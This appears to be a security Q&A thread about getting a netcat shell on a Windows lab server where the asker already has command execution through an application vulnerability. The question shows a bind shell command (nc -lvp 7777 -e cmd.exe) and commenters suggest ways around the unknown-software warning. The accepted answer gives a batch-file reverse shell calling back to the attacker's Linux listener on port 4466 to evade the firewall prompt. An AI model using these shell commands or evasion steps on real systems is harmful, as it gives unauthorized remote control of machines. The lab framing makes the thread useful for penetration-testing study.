3

I need to run a netcat on a remote lab machine. I can execute remote commands through the browser with Administrator rights (because of the application vulnerability) but I don't have access to the machine itself.

I uploaded nc.exe on a remote server but it doesn't work, most likely due to Windows asking the if it's OK to run unknown software, but there is no one to click "Allow".

So I tried to use exe2bat software, but I think I did something wrong when I did the conversion.

This command that should be working for me: nc.exe -lvp 7777 -e cmd.exe
Conversion: exe2bat nc.exe nc.bat
Execution: nc.bat -lvp 7777 -e cmd.exe

Can you advise why it doesn't work for me or what I am doing wrong, or if there any other better exe to bat converter?

Dranik
  • 233
  • 1
  • 3
  • 8
  • Can you compile and run netcat or a similar script on the remote machine? If you can't upload the file you want, you could simply build it on the remote machine. – schroeder Dec 30 '15 at 19:28
  • Are you saying that if I use exe2bat on one machine, then upload bat file to another machine it might not work? so I should do exe2bat conversion on a target machine in a first place? – Dranik Dec 30 '15 at 19:50
  • I mean, copy the code of netcat over to the remote machine and compile it there. It should not give the warning about being unknown software because that machine created it. There are also other versions of nc that are in various scripting languages that you could use instead (python, powershell, etc.) – schroeder Dec 30 '15 at 20:16
  • I'll look into Powercat. Compiling might not be a good option since remote server doesn't have any compilers installed on it (such as Python, C, or anything else) and it appears to be a Windows 2008 Server. Unless there are compilers that do not require any installation and trusted by the system. Thanks for the hint, – Dranik Dec 30 '15 at 20:54
  • It's most likely the windows firewall. Try the netcat clone, sbd. Also, what happens if you try port 443 instead of 7777? – 16b7195abb140a3929bbc322d1c6f1 Dec 30 '15 at 21:39
  • sbd, powershell script all were asking for permission to run unknown software. – Dranik Jan 05 '16 at 14:27

1 Answers1

2

I had to upload nc.exe and nc2.bat to bypass "Unknown software" security warning.
nc2.bat content to initiate connection from inside and avoid firewall security prompt: 

@echo on
c:\%path_to_nc%\nc -nv %LINUX_IP% 4466 -e cmd

  1. Then set up a listener on Linux IP 

    nc -nlvp 4466

  2. Execute remote command calling for nc2

This way I got command prompt from the Windows box right away.

Dranik
  • 233
  • 1
  • 3
  • 8